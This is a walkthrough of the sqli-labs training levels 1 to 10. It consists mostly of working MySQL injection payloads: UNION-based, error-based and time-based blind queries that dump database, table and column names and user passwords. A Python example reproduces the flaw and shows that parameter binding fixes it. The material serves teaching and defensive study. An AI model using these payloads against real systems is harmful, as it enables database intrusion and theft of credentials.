SQL injection 1
Less-1 through Less-10
First enter ?id=1 and observe the page: it shows a successful login.
Use UNION-based injection.
(1) Find the number of columns (a non-existent id must be used)
?id=0' order by 3--+   page displays normally
Entering ?id=0' order by 4--+ produces an error, so there are three columns.
(2) Dump the database name
?id=0' union select 1,(select database()),3--+
This reveals the database name security.
(3) Dump the table names
?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
(4) Dump the column names
From the previous step we obtain the table we want, users.
?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),3--+
(5) Dump the usernames and passwords
?id=0' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
Less-1 through Less-4 differ only in how the injected value is closed: ', ", '), ") and "no closing quote at all".
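As an added illustration that is not part of the original write-up, the Less-1 query shape is rebuilt here on SQLite with a constructed users table (the table contents, the lookup functions and the probe helper are all assumptions) to show why the ' closure and the trailing comment work, why the ORDER BY probe reveals the column count, and how parameter binding stops the same input.

```python
import sqlite3

# Constructed stand-in for the lab's users table (assumption, not the lab's real data).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

# Input shaped like the page's Less-1 UNION step, adapted to SQLite syntax.
UNION_PAYLOAD = "0' union select id,username,password from users -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, id_param):
    # The value is spliced into the SQL text. A quote in the input closes the
    # id literal, the rest is parsed as SQL, and '--' hides the trailing LIMIT.
    sql = f"SELECT * FROM users WHERE id='{id_param}' LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    # Parameter binding keeps the value out of the query text: the quote and
    # UNION are just characters in a string that no id equals.
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 1", (id_param,)).fetchall()


def order_by_probe_ok(conn, n):
    # Why step (1) on the page works: ORDER BY <n> is rejected once n exceeds
    # the number of selected columns, so the first failing n gives the count.
    try:
        conn.execute(f"SELECT * FROM users WHERE id='0' order by {n} -- '")
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", lookup_vulnerable(conn, UNION_PAYLOAD))  # every row comes back
    print("safe:      ", lookup_safe(conn, UNION_PAYLOAD))        # []
    print("order by 3:", order_by_probe_ok(conn, 3), "order by 4:", order_by_probe_ok(conn, 4))
```

The same fix applies to the later levels: whichever closing characters the level expects, a bound parameter is never parsed as SQL, so the closure no longer matters.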
Less-5
When a correct id is entered the page behaves differently from the first four levels, so UNION injection cannot be used; time-based blind, boolean-based blind, or error-based injection can be used instead.
Error-based injection:
(1) Dump the database name
?id=-1' union select count(*),1, concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
(2) Dump the table names
?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
(3) Dump the column names
?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
(4) Dump the users
?id=-1' union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
Time-based blind injection:
1. Dump the length of the database name
?id=1' and if(length(database())=8,sleep(5),1)--+
This means that if the database name is 8 characters long, the page "sleeps" for 5 seconds before refreshing.
2. Dump the database name
?id=1' and if(left(database(),1)='s',sleep(5),1)--+
3. Dump the table names
?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+
4. Dump the column names
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+
5. Dump the users
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
Less-6 follows Less-5, but its closure uses double quotes.
Less-7, 8 and 9 follow Less-5: single-quote-closed time-based blind injection.
Less-10 is double-quote-closed time-based blind injection.